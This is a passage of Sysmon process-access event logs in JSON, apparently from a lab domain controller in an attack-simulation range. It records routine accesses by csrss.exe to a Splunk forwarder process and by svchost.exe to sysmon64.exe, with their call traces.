Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:56:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:56:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3994,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:56:41.318\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2336\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2039-5F25-0000-0010210B0600}\r\nTargetProcessId: 4580\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:56:41.318","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2336","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2039-5F25-0000-0010210B0600}","TargetProcessId":"4580","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:56:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:56:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3995,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:56:41.318\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:56:41.318","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:56:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:56:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3996,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:56:41.318\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:56:41.318","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:56:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:56:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3997,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:56:41.318\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:56:41.318","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:56:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:56:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3998,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:56:41.318\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:56:41.318","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:56:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:56:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3999,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:56:41.318\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:56:41.318","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:56:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:56:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4000,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:56:41.318\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:56:41.318","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:56:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:56:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4001,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:56:41.318\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:56:41.318","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:56:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
